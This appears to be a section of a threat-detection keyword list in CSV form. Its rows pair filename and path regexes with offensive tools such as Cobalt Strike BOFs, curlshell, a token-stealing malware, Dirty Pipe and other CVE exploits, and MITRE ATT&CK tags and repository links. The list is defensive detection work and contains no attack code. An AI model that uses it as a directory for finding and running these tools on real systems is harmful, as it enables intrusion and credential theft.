"*/cups-info.nse*",".{0,1000}\/cups\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/cups-queue-info.nse*",".{0,1000}\/cups\-queue\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/curl.cna",".{0,1000}\/curl\.cna","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*/curl.x64.o",".{0,1000}\/curl\.x64\.o","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*/curl.x86.o",".{0,1000}\/curl\.x86\.o","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*/curlshell.git*",".{0,1000}\/curlshell\.git.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","10","10","424","69","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z" "*/curlshell.git*",".{0,1000}\/curlshell\.git.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","10","10","424","69","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z" "*/curlshell.py*",".{0,1000}\/curlshell\.py.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","10","10","424","69","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z" "*/curlshell-main.*",".{0,1000}\/curlshell\-main\..{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","10","10","424","69","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z" "*/curlshell-main/*",".{0,1000}\/curlshell\-main\/.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","424","69","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z" "*/cursorinit.vbs*",".{0,1000}\/cursorinit\.vbs.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","1","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*/custom_crack_list.txt*",".{0,1000}\/custom_crack_list\.txt.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/custom_payload_generator/*",".{0,1000}\/custom_payload_generator\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Aggressor Scripts I've Created.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/offsecginger/AggressorScripts","1","1","N/A","10","10","145","30","2022-01-01T19:04:27Z","2018-11-30T03:14:45Z" "*/customPayload/*",".{0,1000}\/customPayload\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/CVE-*-*_POC.py*",".{0,1000}\/CVE\-.{0,1000}\-.{0,1000}_POC\.py.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*/CVE-*.bin",".{0,1000}\/CVE\-.{0,1000}\.bin","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/CVE-*.jar",".{0,1000}\/CVE\-.{0,1000}\.jar","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/CVE*/chocobo_root*",".{0,1000}\/CVE.{0,1000}\/chocobo_root.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/cve*/exploit.go*",".{0,1000}\/cve.{0,1000}\/exploit\.go.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6497","579","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z" "*/CVE-*_EXPLOIT_0DAY/*",".{0,1000}\/CVE\-.{0,1000}_EXPLOIT_0DAY\/.{0,1000}","offensive_tool_keyword","poc","Exploit for the CVE-2023-23399","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY","1","1","N/A","N/A","2","157","45","2023-03-15T17:53:53Z","2023-03-15T17:03:38Z" "*/CVE-*x64.exe",".{0,1000}\/CVE\-.{0,1000}x64\.exe","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/CVE-*x86.exe",".{0,1000}\/CVE\-.{0,1000}x86\.exe","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/CVE-2009-2698/katon.c*",".{0,1000}\/CVE\-2009\-2698\/katon\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/CVE-2022-*.git*",".{0,1000}\/CVE\-2022\-.{0,1000}\.git.{0,1000}","offensive_tool_keyword","POC","POC exploit pattern from github","T1203 - T1218 - T1059 - T1064 - T1204","TA0001 - TA0002","N/A","N/A","Exploitation tools","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/CVE-2022-*.go*",".{0,1000}\/CVE\-2022\-.{0,1000}\.go.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*/CVE-2022-0847.c*",".{0,1000}\/CVE\-2022\-0847\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/4luc4rdr5290/CVE-2022-0847","1","1","N/A","N/A","1","1","2","2022-03-08T20:41:15Z","2022-03-08T20:18:28Z" "*/CVE-2022-0847/write_anything.c*",".{0,1000}\/CVE\-2022\-0847\/write_anything\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0008","N/A","N/A","Exploitation tools","https://github.com/gyaansastra/CVE-2022-0847","1","1","N/A","N/A","1","1","2","2022-03-20T15:46:04Z","2022-03-09T15:44:58Z" "*/CVE-2022-0847-dirty-pipe-checker*",".{0,1000}\/CVE\-2022\-0847\-dirty\-pipe\-checker.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker","1","1","N/A","N/A","1","62","27","2023-06-14T23:25:46Z","2022-03-08T17:13:24Z" "*/CVE-2022-0847-DirtyPipe-Exploit*",".{0,1000}\/CVE\-2022\-0847\-DirtyPipe\-Exploit.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit","1","1","N/A","N/A","10","1074","219","2022-03-08T06:20:05Z","2022-03-07T18:55:20Z" "*/CVE-2022-0847-dirty-pipe-exploit*",".{0,1000}\/CVE\-2022\-0847\-dirty\-pipe\-exploit.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/cspshivam/CVE-2022-0847-dirty-pipe-exploit","1","1","N/A","N/A","1","2","3","2022-03-08T11:15:00Z","2022-03-08T10:40:07Z" "*/CVE-2022-0847-Docker*",".{0,1000}\/CVE\-2022\-0847\-Docker.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/mrchucu1/CVE-2022-0847-Docker","1","1","N/A","N/A","1","0","1","2022-03-08T17:05:01Z","2022-03-08T17:02:40Z" "*/cve-2022-23131-exp/blob/main/zabbix.py*",".{0,1000}\/cve\-2022\-23131\-exp\/blob\/main\/zabbix\.py.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/random-robbie/cve-2022-23131-exp","1","1","N/A","N/A","1","8","7","2022-02-23T16:37:13Z","2022-02-23T16:34:03Z" "*/CVE-2022-26809-RCE*",".{0,1000}\/CVE\-2022\-26809\-RCE.{0,1000}","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/websecnl/CVE-2022-26809","1","1","N/A","N/A","1","30","3","2022-04-19T17:04:04Z","2022-04-14T08:12:24Z" "*/CVE-2023-*.git*",".{0,1000}\/CVE\-2023\-.{0,1000}\.git.{0,1000}","offensive_tool_keyword","POC","POC exploit pattern from github","T1203 - T1218 - T1059 - T1064 - T1204","TA0001 - TA0002","N/A","N/A","Exploitation tools","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/CVE-2023-34362.git*",".{0,1000}\/CVE\-2023\-34362\.git.{0,1000}","offensive_tool_keyword","POC","CVE-2023-34362: MOVEit Transfer Unauthenticated RCE","T1190.001 - T1210.002 - T1068 - T1059.001 - T1059.003","TA0005 - TA0001 - TA0002 - TA0043","N/A","N/A","Exploitation tools","https://github.com/sfewer-r7/CVE-2023-34362","1","1","N/A","N/A","1","62","23","2024-03-24T00:46:38Z","2023-06-12T12:56:12Z" "*/CVE-2023-38831-RaRCE*",".{0,1000}\/CVE\-2023\-38831\-RaRCE.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","1","N/A","9","2","114","21","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" "*/CVE-2024-1086.git*",".{0,1000}\/CVE\-2024\-1086\.git.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","1","CVE-2024-1086 POC","10","10","1898","237","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z" "*/CVE-2024-21338.git*",".{0,1000}\/CVE\-2024\-21338\.git.{0,1000}","offensive_tool_keyword","POC","Local Privilege Escalation from Admin to Kernel vulnerability on Windows 10 and Windows 11 operating systems with HVCI enabled.","T1055.011 - T1548.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/hakaioffsec/CVE-2024-21338","1","1","N/A","9","3","207","48","2024-04-16T21:00:14Z","2024-04-13T05:53:02Z" "*/cvs-brute.nse*",".{0,1000}\/cvs\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/cvs-brute-repository.nse*",".{0,1000}\/cvs\-brute\-repository\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/CWoNaJLBo/VTNeWw11212/*",".{0,1000}\/CWoNaJLBo\/VTNeWw11212\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/CWoNaJLBo/VTNeWw11213/*",".{0,1000}\/CWoNaJLBo\/VTNeWw11213\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/Cybellum*",".{0,1000}\/Cybellum.{0,1000}","offensive_tool_keyword","Github Username","Zero day code injection and vulnerabilities github repo","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/Cybellum","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/CyDefUnicorn*",".{0,1000}\/CyDefUnicorn.{0,1000}","offensive_tool_keyword","Github Username","pentest tools repo","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/CyDefUnicorn","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/D1rkInject.git*",".{0,1000}\/D1rkInject\.git.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","154","27","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" "*/D3m0n1z3dShell.git*",".{0,1000}\/D3m0n1z3dShell\.git.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*/D3m0n1z3dShell/archive/*",".{0,1000}\/D3m0n1z3dShell\/archive\/.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*/d4em0n/exrop*",".{0,1000}\/d4em0n\/exrop.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","277","27","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" "*/daap-get-library.nse*",".{0,1000}\/daap\-get\-library\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 